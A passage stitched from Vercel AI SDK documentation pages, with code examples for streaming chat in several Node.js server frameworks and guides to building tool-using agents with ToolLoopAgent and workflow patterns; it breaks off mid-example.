const { text } = await generateText({
  model: deepseek('deepseek-chat'),
  prompt: 'Explain the concept of sparse attention in transformers.',
});

Building Interactive Interfaces

AI SDK UI provides robust abstractions that simplify the complex tasks of managing chat streams and UI updates on the frontend, enabling you to develop dynamic AI-driven interfaces more efficiently.

Let's explore building an agent with Next.js, the AI SDK, and DeepSeek V3.2:

In a new Next.js application, first install the AI SDK and the DeepSeek provider:

Then, create a route handler for the chat endpoint:

import { deepseek } from '@ai-sdk/deepseek';
import { convertToModelMessages, streamText, UIMessage } from 'ai';

export async function POST(req: Request) {
  const { messages }: { messages: UIMessage[] } = await req.json();

  const result = streamText({
    model: deepseek('deepseek-reasoner'),
    messages: await convertToModelMessages(messages),
  });

  return result.toUIMessageStreamResponse({ sendReasoning: true });
}

Finally, update the root page (app/page.tsx) to use the useChat hook:

'use client';

import { useChat } from '@ai-sdk/react';
import { useState } from 'react';

export default function Page() {
  const [input, setInput] = useState('');
  const { messages, sendMessage } = useChat();

  const handleSubmit = (e: React.FormEvent<HTMLFormElement>) => {
    e.preventDefault();
    if (input.trim()) {
      sendMessage({ text: input });
      setInput('');
    }
  };

  return (
    <>
      {messages.map(message => (
        <div key={message.id}>
          {message.role === 'user' ? 'User: ' : 'AI: '}
          {message.parts.map((part, index) => {
            if (part.type === 'text' || part.type === 'reasoning') {
              return <div key={index}>{part.text}</div>;
            }
            return null;
          })}
        </div>
      ))}
      <form onSubmit={handleSubmit}>
        <input
          name="prompt"
          value={input}
          onChange={e => setInput(e.target.value)}
        />
        <button type="submit">Submit</button>
      </form>
    </>
  );
}

Enhance Your Agent with Tools

Update Your Route Handler

Let's add a weather tool to your agent. Update your route handler at app/api/chat/route.ts:

import { deepseek } from '@ai-sdk/deepseek';
import {
  convertToModelMessages,
  isStepCount,
  streamText,
  tool,
  UIMessage,
} from 'ai';
import { z } from 'zod';

export async function POST(req: Request) {
  const { messages }: { messages: UIMessage[] } = await req.json();

  const result = streamText({
    model: deepseek('deepseek-reasoner'),
    messages: await convertToModelMessages(messages),
    tools: {
      weather: tool({
        description: 'Get the weather in a location',
        inputSchema: z.object({
          location: z.string().describe('The location to get the weather for'),
        }),
        execute: async ({ location }) => ({
          location,
          temperature: 72,
          unit: 'fahrenheit',
        }),
      }),
    },
    stopWhen: isStepCount(5),
  });

  return result.toUIMessageStreamResponse({ sendReasoning: true });
}

This adds a weather tool that the model can call when needed. The stopWhen: isStepCount(5) parameter allows the agent to continue executing for multiple steps (up to 5), enabling it to use tools and reason iteratively before stopping. Learn more about loop control to customize when and how your agent stops execution.

Get Started

Ready to dive in? Here's how you can begin:

Explore the documentation at ai-sdk.dev/docs to understand the capabilities of the AI SDK.
Check out practical examples at ai-sdk.dev/examples to see the SDK in action.
Dive deeper with advanced guides on topics like Retrieval-Augmented Generation (RAG) at ai-sdk.dev/docs/guides.
Use ready-to-deploy AI templates at vercel.com/templates?type=ai.

title: Guides description: Learn how to build AI applications with the AI SDK

Guides

These use-case specific guides are intended to help you build real applications with the AI SDK.

title: Node.js HTTP Server description: Learn how to use the AI SDK in a Node.js HTTP server tags: ['api servers', 'streaming']

Node.js HTTP Server

You can use the AI SDK in a Node.js HTTP server to generate text and stream it to the client.

Examples

The examples start a simple HTTP server that listens on port 8080. You can e.g. test it using curl:

curl -X POST http://localhost:8080

Full example: github.com/vercel/ai/examples/node-http-server

UI Message Stream

You can use the pipeUIMessageStreamToResponse method to pipe the stream data to the server response.

import { streamText } from 'ai';
import { createServer } from 'http';

createServer(async (req, res) => {
  const result = streamText({
    model: 'openai/gpt-4o',
    prompt: 'Invent a new holiday and describe its traditions.',
  });

  result.pipeUIMessageStreamToResponse(res);
}).listen(8080);

Sending Custom Data

createUIMessageStream and pipeUIMessageStreamToResponse can be used to send custom data to the client.

import {
  createUIMessageStream,
  pipeUIMessageStreamToResponse,
  streamText,
} from 'ai';
import { createServer } from 'http';

createServer(async (req, res) => {
  switch (req.url) {
    case '/stream-data': {
      const stream = createUIMessageStream({
        execute: ({ writer }) => {
          // write some custom data
          writer.write({ type: 'start' });

          writer.write({
            type: 'data-custom',
            data: {
              custom: 'Hello, world!',
            },
          });

          const result = streamText({
            model: 'openai/gpt-4o',
            prompt: 'Invent a new holiday and describe its traditions.',
          });

          writer.merge(
            result.toUIMessageStream({
              sendStart: false,
              onError: error => {
                // Error messages are masked by default for security reasons.
                // If you want to expose the error message to the client, you can do so here:
                return error instanceof Error ? error.message : String(error);
              },
            }),
          );
        },
      });

      pipeUIMessageStreamToResponse({ stream, response: res });

      break;
    }
  }
}).listen(8080);

Text Stream

You can send a text stream to the client using pipeTextStreamToResponse.

import { streamText } from 'ai';
import { createServer } from 'http';

createServer(async (req, res) => {
  const result = streamText({
    model: 'openai/gpt-4o',
    prompt: 'Invent a new holiday and describe its traditions.',
  });

  result.pipeTextStreamToResponse(res);
}).listen(8080);

Troubleshooting

Streaming not working when proxied

title: Express description: Learn how to use the AI SDK in an Express server tags: ['api servers', 'streaming']

Express

You can use the AI SDK in an Express server to generate and stream text and objects to the client.

Examples

The examples start a simple HTTP server that listens on port 8080. You can e.g. test it using curl:

curl -X POST http://localhost:8080

Full example: github.com/vercel/ai/examples/express

UI Message Stream

You can use the pipeUIMessageStreamToResponse method to pipe the stream data to the server response.

import { streamText } from 'ai';
import express, { Request, Response } from 'express';

const app = express();

app.post('/', async (req: Request, res: Response) => {
  const result = streamText({
    model: 'openai/gpt-4o',
    prompt: 'Invent a new holiday and describe its traditions.',
  });

  result.pipeUIMessageStreamToResponse(res);
});

app.listen(8080, () => {
  console.log(`Example app listening on port ${8080}`);
});

Sending Custom Data

pipeUIMessageStreamToResponse can be used to send custom data to the client.

import {
  createUIMessageStream,
  pipeUIMessageStreamToResponse,
  streamText,
} from 'ai';
import express, { Request, Response } from 'express';

const app = express();

app.post('/custom-data-parts', async (req: Request, res: Response) => {
  pipeUIMessageStreamToResponse({
    response: res,
    stream: createUIMessageStream({
      execute: async ({ writer }) => {
        writer.write({ type: 'start' });

        writer.write({
          type: 'data-custom',
          data: {
            custom: 'Hello, world!',
          },
        });

        const result = streamText({
          model: 'openai/gpt-4o',
          prompt: 'Invent a new holiday and describe its traditions.',
        });

        writer.merge(result.toUIMessageStream({ sendStart: false }));
      },
    }),
  });
});

app.listen(8080, () => {
  console.log(`Example app listening on port ${8080}`);
});

Text Stream

You can send a text stream to the client using pipeTextStreamToResponse.

import { streamText } from 'ai';
import express, { Request, Response } from 'express';

const app = express();

app.post('/', async (req: Request, res: Response) => {
  const result = streamText({
    model: 'openai/gpt-4o',
    prompt: 'Invent a new holiday and describe its traditions.',
  });

  result.pipeTextStreamToResponse(res);
});

app.listen(8080, () => {
  console.log(`Example app listening on port ${8080}`);
});

Troubleshooting

Streaming not working when proxied

title: Hono description: Example of using the AI SDK in a Hono server. tags: ['api servers', 'streaming']

Hono

You can use the AI SDK in a Hono server to generate and stream text and objects to the client.

Examples

The examples start a simple HTTP server that listens on port 8080. You can e.g. test it using curl:

curl -X POST http://localhost:8080

Full example: github.com/vercel/ai/examples/hono

UI Message Stream

You can use the toUIMessageStreamResponse method to create a properly formatted streaming response.

import { serve } from '@hono/node-server';
import { streamText } from 'ai';
import { Hono } from 'hono';

const app = new Hono();

app.post('/', async c => {
  const result = streamText({
    model: 'openai/gpt-4o',
    prompt: 'Invent a new holiday and describe its traditions.',
  });
  return result.toUIMessageStreamResponse();
});

serve({ fetch: app.fetch, port: 8080 });

Text Stream

You can use the toTextStreamResponse method to return a text stream response.

import { serve } from '@hono/node-server';
import { streamText } from 'ai';
import { Hono } from 'hono';

const app = new Hono();

app.post('/text', async c => {
  const result = streamText({
    model: 'openai/gpt-4o',
    prompt: 'Write a short poem about coding.',
  });
  return result.toTextStreamResponse();
});

serve({ fetch: app.fetch, port: 8080 });

Sending Custom Data

You can use createUIMessageStream and createUIMessageStreamResponse to send custom data to the client.

import { serve } from '@hono/node-server';
import {
  createUIMessageStream,
  createUIMessageStreamResponse,
  streamText,
} from 'ai';
import { Hono } from 'hono';

const app = new Hono();

app.post('/stream-data', async c => {
  // immediately start streaming the response
  const stream = createUIMessageStream({
    execute: ({ writer }) => {
      writer.write({ type: 'start' });

      writer.write({
        type: 'data-custom',
        data: {
          custom: 'Hello, world!',
        },
      });

      const result = streamText({
        model: 'openai/gpt-4o',
        prompt: 'Invent a new holiday and describe its traditions.',
      });

      writer.merge(
        result.toUIMessageStream({
          sendStart: false,
          onError: error => {
            // Error messages are masked by default for security reasons.
            // If you want to expose the error message to the client, you can do so here:
            return error instanceof Error ? error.message : String(error);
          },
        }),
      );
    },
  });
  return createUIMessageStreamResponse({ stream });
});

serve({ fetch: app.fetch, port: 8080 });

Troubleshooting

Streaming not working when proxied

title: Fastify description: Learn how to use the AI SDK in a Fastify server tags: ['api servers', 'streaming']

Fastify

You can use the AI SDK in a Fastify server to generate and stream text and objects to the client.

Examples

The examples start a simple HTTP server that listens on port 8080. You can e.g. test it using curl:

curl -X POST http://localhost:8080

Full example: github.com/vercel/ai/examples/fastify

UI Message Stream

You can use the toUIMessageStream method to get a UI message stream from the result and then pipe it to the response.

import { streamText } from 'ai';
import Fastify from 'fastify';

const fastify = Fastify({ logger: true });

fastify.post('/', async function (request, reply) {
  const result = streamText({
    model: 'openai/gpt-4o',
    prompt: 'Invent a new holiday and describe its traditions.',
  });

  reply.header('Content-Type', 'text/plain; charset=utf-8');

  return reply.send(result.toUIMessageStream());
});

fastify.listen({ port: 8080 });

Sending Custom Data

createUIMessageStream can be used to send custom data to the client.

import { createUIMessageStream, streamText } from 'ai';
import Fastify from 'fastify';

const fastify = Fastify({ logger: true });

fastify.post('/stream-data', async function (request, reply) {
  // immediately start streaming the response
  const stream = createUIMessageStream({
    execute: async ({ writer }) => {
      writer.write({ type: 'start' });

      writer.write({
        type: 'data-custom',
        data: {
          custom: 'initialized call',
        },
      });

      const result = streamText({
        model: 'openai/gpt-4o',
        prompt: 'Invent a new holiday and describe its traditions.',
      });

      writer.merge(result.toUIMessageStream({ sendStart: false }));
    },
    onError: error => {
      // Error messages are masked by default for security reasons.
      // If you want to expose the error message to the client, you can do so here:
      return error instanceof Error ? error.message : String(error);
    },
  });

  reply.header('Content-Type', 'text/plain; charset=utf-8');

  return reply.send(stream);
});

fastify.listen({ port: 8080 });

Text Stream

You can use the textStream property to get a text stream from the result and then pipe it to the response.

import { streamText } from 'ai';
import Fastify from 'fastify';

const fastify = Fastify({ logger: true });

fastify.post('/', async function (request, reply) {
  const result = streamText({
    model: 'openai/gpt-4o',
    prompt: 'Invent a new holiday and describe its traditions.',
  });

  reply.header('Content-Type', 'text/plain; charset=utf-8');

  return reply.send(result.textStream);
});

fastify.listen({ port: 8080 });

Troubleshooting

Streaming not working when proxied

title: Nest.js description: Learn how to use the AI SDK in a Nest.js server tags: ['api servers', 'streaming']

Nest.js

You can use the AI SDK in a Nest.js server to generate and stream text and objects to the client.

Examples

The examples show how to implement a Nest.js controller that uses the AI SDK to stream text and objects to the client.

Full example: github.com/vercel/ai/examples/nest

UI Message Stream

You can use the pipeUIMessageStreamToResponse method to pipe the stream data to the server response.

import { Controller, Post, Res } from '@nestjs/common';
import { streamText } from 'ai';
import { Response } from 'express';

@Controller()
export class AppController {
  @Post('/')
  async root(@Res() res: Response) {
    const result = streamText({
      model: 'openai/gpt-4o',
      prompt: 'Invent a new holiday and describe its traditions.',
    });

    result.pipeUIMessageStreamToResponse(res);
  }
}

Sending Custom Data

createUIMessageStream and pipeUIMessageStreamToResponse can be used to send custom data to the client.

import { Controller, Post, Res } from '@nestjs/common';
import {
  createUIMessageStream,
  streamText,
  pipeUIMessageStreamToResponse,
} from 'ai';
import { Response } from 'express';

@Controller()
export class AppController {
  @Post('/stream-data')
  async streamData(@Res() response: Response) {
    const stream = createUIMessageStream({
      execute: ({ writer }) => {
        // write some data
        writer.write({ type: 'start' });

        writer.write({
          type: 'data-custom',
          data: {
            custom: 'Hello, world!',
          },
        });

        const result = streamText({
          model: 'openai/gpt-4o',
          prompt: 'Invent a new holiday and describe its traditions.',
        });
        writer.merge(
          result.toUIMessageStream({
            sendStart: false,
            onError: error => {
              // Error messages are masked by default for security reasons.
              // If you want to expose the error message to the client, you can do so here:
              return error instanceof Error ? error.message : String(error);
            },
          }),
        );
      },
    });
    pipeUIMessageStreamToResponse({ stream, response });
  }
}

Text Stream

You can use the pipeTextStreamToResponse method to get a text stream from the result and then pipe it to the response.

import { Controller, Post, Res } from '@nestjs/common';
import { streamText } from 'ai';
import { Response } from 'express';

@Controller()
export class AppController {
  @Post()
  async example(@Res() res: Response) {
    const result = streamText({
      model: 'openai/gpt-4o',
      prompt: 'Invent a new holiday and describe its traditions.',
    });

    result.pipeTextStreamToResponse(res);
  }
}

Troubleshooting

Streaming not working when proxied

title: AI SDK by Vercel description: The AI SDK is the TypeScript toolkit for building AI applications and agents with React, Next.js, Vue, Svelte, Node.js, and more.

AI SDK

The AI SDK is the TypeScript toolkit designed to help developers build AI-powered applications and agents with React, Next.js, Vue, Svelte, Node.js, and more.

Why use the AI SDK?

Integrating large language models (LLMs) into applications is complicated and heavily dependent on the specific model provider you use.

For example, here’s how you can generate text with various models using the AI SDK:

The AI SDK has two main libraries:

AI SDK Core: A unified API for generating text, structured objects, tool calls, and building agents with LLMs.
AI SDK UI: A set of framework-agnostic hooks for quickly building chat and generative user interface.

Model Providers

The AI SDK supports multiple model providers.

Templates

We've built some templates that include AI SDK integrations for different use cases, providers, and frameworks. You can use these templates to get started with your AI-powered application.

Starter Kits

Feature Exploration

Frameworks

Generative UI

Security

Join our Community

If you have questions about anything related to the AI SDK, you're always welcome to ask our community on the Vercel Community.

`llms.txt` (for Cursor, Windsurf, Copilot, Claude etc.)

Example Usage

For instance, to prompt an LLM with questions about the AI SDK:

Copy the documentation contents from ai-sdk.dev/llms.txt
Use the following prompt format:

Documentation:
{paste documentation here}
---
Based on the above documentation, answer the following:
{your question}

title: Overview description: Learn how to build agents with the AI SDK.

Agents

Agents are large language models (LLMs) that use tools in a loop to accomplish tasks.

These components work together:

LLMs process input and decide the next action
Tools extend capabilities beyond text generation (reading files, calling APIs, writing to databases)
Loop orchestrates execution through:
- Context management - Maintaining conversation history and deciding what the model sees (input) at each step
- Stopping conditions - Determining when the loop (task) is complete

ToolLoopAgent Class

The ToolLoopAgent class handles these three components. Here's an agent that uses multiple tools in a loop to accomplish a task:

import { ToolLoopAgent, tool } from 'ai';
__PROVIDER_IMPORT__;
import { z } from 'zod';

const weatherAgent = new ToolLoopAgent({
  model: __MODEL__,
  tools: {
    weather: tool({
      description: 'Get the weather in a location (in Fahrenheit)',
      inputSchema: z.object({
        location: z.string().describe('The location to get the weather for'),
      }),
      execute: async ({ location }) => ({
        location,
        temperature: 72 + Math.floor(Math.random() * 21) - 10,
      }),
    }),
    convertFahrenheitToCelsius: tool({
      description: 'Convert temperature from Fahrenheit to Celsius',
      inputSchema: z.object({
        temperature: z.number().describe('Temperature in Fahrenheit'),
      }),
      execute: async ({ temperature }) => {
        const celsius = Math.round((temperature - 32) * (5 / 9));
        return { celsius };
      },
    }),
  },
});

const result = await weatherAgent.generate({
  prompt: 'What is the weather in San Francisco in celsius?',
});

console.log(result.text); // agent's final answer
console.log(result.steps); // steps taken by the agent

The agent automatically:

Calls the weather tool to get the temperature in Fahrenheit
Calls convertFahrenheitToCelsius to convert it
Generates a final text response with the result

The ToolLoopAgent handles the loop, context management, and stopping conditions.

Why Use the ToolLoopAgent?

The ToolLoopAgent is the recommended approach for building agents with the AI SDK because it:

Reduces boilerplate - Manages loops and message arrays
Improves reusability - Define once, use throughout your application
Simplifies maintenance - Single place to update agent configuration

For most use cases, start with the ToolLoopAgent. Use core functions (generateText, streamText) when you need explicit control over each step for complex structured workflows.

Structured Workflows

Agents are flexible and powerful, but non-deterministic. When you need reliable, repeatable outcomes with explicit control flow, use core functions with structured workflow patterns combining:

Conditional statements for explicit branching
Standard functions for reusable logic
Error handling for robustness
Explicit control flow for predictability

Explore workflow patterns to learn more about building structured, reliable systems.

Next Steps

Building Agents - Guide to creating agents with the ToolLoopAgent
Workflow Patterns - Structured patterns using core functions for complex workflows
Loop Control - Execution control with stopWhen and prepareStep

title: Building Agents description: Complete guide to creating agents with the ToolLoopAgent.

Building Agents

Why Use the ToolLoopAgent Class?

When building AI applications, you often need to:

Reuse configurations - Same model settings, tools, and prompts across different parts of your application
Maintain consistency - Ensure the same behavior and capabilities throughout your codebase
Simplify API routes - Reduce boilerplate in your endpoints
Type safety - Get full TypeScript support for your agent's tools and outputs

The ToolLoopAgent class provides a single place to define your agent's behavior.

Creating an Agent

Define an agent by instantiating the ToolLoopAgent class with your desired configuration:

import { ToolLoopAgent } from 'ai';
__PROVIDER_IMPORT__;

const myAgent = new ToolLoopAgent({
  model: __MODEL__,
  instructions: 'You are a helpful assistant.',
  tools: {
    // Your tools here
  },
});

Configuration Options

The ToolLoopAgent accepts all the same settings as generateText and streamText. Configure:

Model and System Instructions

import { ToolLoopAgent } from 'ai';
__PROVIDER_IMPORT__;

const agent = new ToolLoopAgent({
  model: __MODEL__,
  instructions: 'You are an expert software engineer.',
});

Tools

Provide tools that the agent can use to accomplish tasks:

import { ToolLoopAgent, tool } from 'ai';
__PROVIDER_IMPORT__;
import { z } from 'zod';

const codeAgent = new ToolLoopAgent({
  model: __MODEL__,
  tools: {
    runCode: tool({
      description: 'Execute Python code',
      inputSchema: z.object({
        code: z.string(),
      }),
      execute: async ({ code }) => {
        // Execute code and return result
        return { output: 'Code executed successfully' };
      },
    }),
  },
});

You can also require approval before a tool executes. Use needsApproval on the tool itself for the default behavior, or set toolNeedsApproval on the ToolLoopAgent when approval should be configured per agent:

const agent = new ToolLoopAgent({
  model: __MODEL__,
  tools: {
    runCode: tool({
      description: 'Execute Python code',
      inputSchema: z.object({
        code: z.string(),
      }),
      execute: async ({ code }) => ({ output: code }),
    }),
  },
  toolNeedsApproval: {
    runCode: true,
  },
});

Loop Control

By default, agents run for 20 steps (stopWhen: isStepCount(20)). In each step, the model either generates text or calls a tool. If it generates text, the agent completes. If it calls a tool, the AI SDK executes that tool.

You can configure stopWhen differently to allow more steps. After each tool execution, the agent triggers a new generation where the model can call another tool or generate text:

import { ToolLoopAgent, isStepCount } from 'ai';
__PROVIDER_IMPORT__;

const agent = new ToolLoopAgent({
  model: __MODEL__,
  stopWhen: isStepCount(50), // Increase default from 20 to 50.
});

Each step represents one generation (which results in either text or a tool call). The loop continues until:

A finish reasoning other than tool-calls is returned, or
A tool that is invoked does not have an execute function, or
A tool call needs approval, or
A stop condition is met

You can combine multiple conditions:

import { ToolLoopAgent, isStepCount } from 'ai';
__PROVIDER_IMPORT__;

const agent = new ToolLoopAgent({
  model: __MODEL__,
  stopWhen: [
    isStepCount(20), // Maximum 20 steps
    yourCustomCondition(), // Custom logic for when to stop
  ],
});

Learn more about loop control and stop conditions.

Tool Choice

Control how the agent uses tools:

import { ToolLoopAgent } from 'ai';
__PROVIDER_IMPORT__;

const agent = new ToolLoopAgent({
  model: __MODEL__,
  tools: {
    // your tools here
  },
  toolChoice: 'required', // Force tool use
  // or toolChoice: 'none' to disable tools
  // or toolChoice: 'auto' (default) to let the model decide
});

You can also force the use of a specific tool:

import { ToolLoopAgent } from 'ai';
__PROVIDER_IMPORT__;

const agent = new ToolLoopAgent({
  model: __MODEL__,
  tools: {
    weather: weatherTool,
    cityAttractions: attractionsTool,
  },
  toolChoice: {
    type: 'tool',
    toolName: 'weather', // Force the weather tool to be used
  },
});

Structured Output

Define structured output schemas:

import { ToolLoopAgent, Output } from 'ai';
__PROVIDER_IMPORT__;
import { z } from 'zod';

const analysisAgent = new ToolLoopAgent({
  model: __MODEL__,
  output: Output.object({
    schema: z.object({
      sentiment: z.enum(['positive', 'neutral', 'negative']),
      summary: z.string(),
      keyPoints: z.array(z.string()),
    }),
  }),
});

const { output } = await analysisAgent.generate({
  prompt: 'Analyze customer feedback from the last quarter',
});

Define Agent Behavior with System Instructions

System instructions define your agent's behavior, personality, and constraints. They set the context for all interactions and guide how the agent responds to user queries and uses tools.

Basic System Instructions

Set the agent's role and expertise:

const agent = new ToolLoopAgent({
  model: __MODEL__,
  instructions:
    'You are an expert data analyst. You provide clear insights from complex data.',
});

Detailed Behavioral Instructions

Provide specific guidelines for agent behavior:

const codeReviewAgent = new ToolLoopAgent({
  model: __MODEL__,
  instructions: `You are a senior software engineer conducting code reviews.

  Your approach:
  - Focus on security vulnerabilities first
  - Identify performance bottlenecks
  - Suggest improvements for readability and maintainability
  - Be constructive and educational in your feedback
  - Always explain why something is an issue and how to fix it`,
});

Constrain Agent Behavior

Set boundaries and ensure consistent behavior:

const customerSupportAgent = new ToolLoopAgent({
  model: __MODEL__,
  instructions: `You are a customer support specialist for an e-commerce platform.

  Rules:
  - Never make promises about refunds without checking the policy
  - Always be empathetic and professional
  - If you don't know something, say so and offer to escalate
  - Keep responses concise and actionable
  - Never share internal company information`,
  tools: {
    checkOrderStatus,
    lookupPolicy,
    createTicket,
  },
});

Tool Usage Instructions

Guide how the agent should use available tools:

const researchAgent = new ToolLoopAgent({
  model: __MODEL__,
  instructions: `You are a research assistant with access to search and document tools.

  When researching:
  1. Always start with a broad search to understand the topic
  2. Use document analysis for detailed information
  3. Cross-reference multiple sources before drawing conclusions
  4. Cite your sources when presenting information
  5. If information conflicts, present both viewpoints`,
  tools: {
    webSearch,
    analyzeDocument,
    extractQuotes,
  },
});

Format and Style Instructions

Control the output format and communication style:

const technicalWriterAgent = new ToolLoopAgent({
  model: __MODEL__,
  instructions: `You are a technical documentation writer.

  Writing style:
  - Use clear, simple language
  - Avoid jargon unless necessary
  - Structure information with headers and bullet points
  - Include code examples where relevant
  - Write in second person ("you" instead of "the user")

  Always format responses in Markdown.`,
});

Using an Agent

Once defined, you can use your agent in three ways:

Generate Text

Use generate() for one-time text generation:

const result = await myAgent.generate({
  prompt: 'What is the weather like?',
});

console.log(result.text);

Stream Text

Use stream() for streaming responses:

const result = await myAgent.stream({
  prompt: 'Tell me a story',
});

for await (const chunk of result.textStream) {
  console.log(chunk);
}

Respond to UI Messages

Use createAgentUIStreamResponse() to create API responses for client applications:

// In your API route (e.g., app/api/chat/route.ts)
import { createAgentUIStreamResponse } from 'ai';

export async function POST(request: Request) {
  const { messages } = await request.json();

  return createAgentUIStreamResponse({
    agent: myAgent,
    uiMessages: messages,
  });
}

Lifecycle Callbacks

Agents provide lifecycle callbacks that let you hook into different phases of the agent execution. These are useful for logging, observability, debugging, and custom telemetry.

const result = await myAgent.generate({
  prompt: 'Research and summarize the latest AI trends',

  experimental_onStart({ model, functionId }) {
    console.log('Agent started', { model: model.modelId, functionId });
  },

  experimental_onStepStart({ stepNumber, model }) {
    console.log(`Step ${stepNumber} starting`, { model: model.modelId });
  },

  experimental_onToolExecutionStart({ toolCall }) {
    console.log(`Tool call starting: ${toolCall.toolName}`);
  },

  experimental_onToolExecutionEnd({ toolCall, durationMs, success }) {
    console.log(`Tool call finished: ${toolCall.toolName} (${durationMs}ms)`, {
      success,
    });
  },

  onStepFinish({ stepNumber, usage, finishReason, toolCalls }) {
    console.log(`Step ${stepNumber} completed:`, {
      inputTokens: usage.inputTokens,
      outputTokens: usage.outputTokens,
      finishReason,
      toolsUsed: toolCalls?.map(tc => tc.toolName),
    });
  },

  onFinish({ totalUsage, steps }) {
    console.log('Agent finished:', {
      totalSteps: steps.length,
      totalTokens: totalUsage.totalTokens,
    });
  },
});

The available lifecycle callbacks are:

experimental_onStart: Called once when the agent operation begins, before any LLM calls. Receives model info, prompt, settings, and runtimeContext.
experimental_onStepStart: Called before each step (LLM call). Receives the step number, model, messages being sent, tools, and prior steps.
experimental_onToolExecutionStart: Called right before a tool's execute function runs. Receives the tool call object with tool name, call ID, and input.
experimental_onToolExecutionEnd: Called right after a tool's execute function completes or errors. Receives the tool call, durationMs, and a success discriminator (output when successful, error when failed).
onStepFinish: Called after each step finishes. Receives step results including usage, finish reason, and tool calls.
onFinish: Called when all steps are finished and the response is complete. Receives all step results, total usage, and runtimeContext.

Constructor vs. Method Callbacks

All lifecycle callbacks can be defined in the constructor for agent-wide tracking, in the generate()/stream() call for per-call tracking, or both. When both are provided, both are called (constructor first, then the method callback):

const agent = new ToolLoopAgent({
  model: __MODEL__,
  onStepFinish: async ({ stepNumber, usage }) => {
    // Agent-wide logging
    console.log(`Agent step ${stepNumber}:`, usage.totalTokens);
  },
});

// Method-level callback runs after constructor callback
const result = await agent.generate({
  prompt: 'Hello',
  onStepFinish: async ({ stepNumber, usage }) => {
    // Per-call tracking (e.g., for billing)
    await trackUsage(stepNumber, usage);
  },
});

End-to-end Type Safety

You can infer types for your agent's UIMessages:

import { ToolLoopAgent, InferAgentUIMessage } from 'ai';

const myAgent = new ToolLoopAgent({
  // ... configuration
});

// Infer the UIMessage type for UI components or persistence
export type MyAgentUIMessage = InferAgentUIMessage<typeof myAgent>;

Use this type in your client components with useChat:

'use client';

import { useChat } from '@ai-sdk/react';
import type { MyAgentUIMessage } from '@/agent/my-agent';

export function Chat() {
  const { messages } = useChat<MyAgentUIMessage>();
  // Full type safety for your messages and tools
}

Next Steps

Now that you understand building agents, you can:

Explore workflow patterns for structured patterns using core functions
Learn about loop control for advanced execution control
See manual loop examples for custom workflow implementations

title: Workflow Patterns description: Learn workflow patterns for building reliable agents with the AI SDK.

Workflow Patterns

Combine the building blocks from the overview with these patterns to add structure and reliability to your agents:

Sequential Processing - Steps executed in order
Parallel Processing - Independent tasks run simultaneously
Evaluation/Feedback Loops - Results checked and improved iteratively
Orchestration - Coordinating multiple components
Routing - Directing work based on context

Choose Your Approach

Consider these key factors:

Flexibility vs Control - How much freedom does the LLM need vs how tightly you must constrain its actions?
Error Tolerance - What are the consequences of mistakes in your use case?
Cost Considerations - More complex systems typically mean more LLM calls and higher costs
Maintenance - Simpler architectures are easier to debug and modify

Start with the simplest approach that meets your needs. Add complexity only when required by:

Breaking down tasks into clear steps
Adding tools for specific capabilities
Implementing feedback loops for quality control
Introducing multiple agents for complex workflows

Let's look at examples of these patterns in action.

Patterns with Examples

Sequential Processing (Chains)

import { generateText, Output } from 'ai';
__PROVIDER_IMPORT__;
import { z } from 'zod';

async function generateMarketingCopy(input: string) {
  const model = __MODEL__;

  // First step: Generate marketing copy
  const { text: copy } = await generateText({
    model,
    prompt: `Write persuasive marketing copy for: ${input}. Focus on benefits and emotional appeal.`,
  });

  // Perform quality check on copy
  const { output: qualityMetrics } = await generateText({
    model,
    output: Output.object({
      schema: z.object({
        hasCallToAction: z.boolean(),
        emotionalAppeal: z.number().min(1).max(10),
        clarity: z.number().min(1).max(10),
      }),
    }),
    prompt: `Evaluate this marketing copy for:
    1. Presence of call to action (true/false)
    2. Emotional appeal (1-10)
    3. Clarity (1-10)

    Copy to evaluate: ${copy}`,
  });

  // If quality check fails, regenerate with more specific instructions
  if (
    !qualityMetrics.hasCallToAction ||
    qualityMetrics.emotionalAppeal < 7 ||
    qualityMetrics.clarity < 7
  ) {
    const { text: improvedCopy } = await generateText({
      model,
      prompt: `Rewrite this marketing copy with:
      ${!qualityMetrics.hasCallToAction ? '- A clear call to action' : ''}
      ${qualityMetrics.emotionalAppeal < 7 ? '- Stronger emotional appeal' : ''}
      ${qualityMetrics.clarity < 7 ? '- Improved clarity and directness' : ''}

      Original copy: ${copy}`,
    });
    return { copy: improvedCopy, qualityMetrics };
  }

  return { copy, qualityMetrics };
}

Routing

import { generateText, Output } from 'ai';
__PROVIDER_IMPORT__;
import { z } from 'zod';

async function handleCustomerQuery(query: string) {
  const model = __MODEL__;

  // First step: Classify the query type
  const { output: classification } = await generateText({
    model,
    output: Output.object({
      schema: z.object({
        reasoning: z.string(),
        type: z.enum(['general', 'refund', 'technical']),
        complexity: z.enum(['simple', 'complex']),
      }),
    }),
    prompt: `Classify this customer query:
    ${query}

    Determine:
    1. Query type (general, refund, or technical)
    2. Complexity (simple or complex)
    3. Brief reasoning for classification`,
  });

  // Route based on classification
  // Set model and system prompt based on query type and complexity
  const { text: response } = await generateText({
    model:
      classification.complexity === 'simple'
        ? 'openai/gpt-4o-mini'
        : 'openai/o4-mini',
    system: {
      general:
        'You are an expert customer service agent handling general inquiries.',
      refund:
        'You are a customer service agent specializing in refund requests. Follow company policy and collect necessary information.',
      technical:
        'You are a technical support specialist with deep product knowledge. Focus on clear step-by-step troubleshooting.',
    }[classification.type],
    prompt: query,
  });

  return { response, classification };
}

Parallel Processing

import { generateText, Output } from 'ai';
__PROVIDER_IMPORT__;
import { z } from 'zod';

// Example: Parallel code review with multiple specialized reviewers
async function parallelCodeReview(code: string) {
  const model = __MODEL__;

  // Run parallel reviews
  const [securityReview, performanceReview, maintainabilityReview] =
    await Promise.all([
      generateText({
        model,
        system:
          'You are an expert in code security. Focus on identifying security vulnerabilities, injection risks, and authentication issues.',
        output: Output.object({
          schema: z.object({
            vulnerabilities: z.array(z.string()),
            riskLevel: z.enum(['low', 'medium', 'high']),
            suggestions: z.array(z.string()),
          }),
        }),
        prompt: `Review this code:
      ${code}`,
      }),

      generateText({
        model,
        system:
          'You are an expert in code performance. Focus on identifying performance bottlenecks, memory leaks, and optimization opportunities.',
        output: Output.object({
          schema: z.object({
            issues: z.array(z.string()),
            impact: z.enum(['low', 'medium', 'high']),
            optimizations: z.array(z.string()),
          }),
        }),
        prompt: `Review this code:
      ${code}`,
      }),

      generateText({
        model,
        system:
          'You are an expert in code quality. Focus on code structure, readability, and adherence to best practices.',
        output: Output.object({
          schema: z.object({
            concerns: z.array(z.string()),
            qualityScore: z.number().min(1).max(10),
            recommendations: z.array(z.string()),
          }),
        }),
        prompt: `Review this code:
      ${code}`,
      }),
    ]);

  const reviews = [
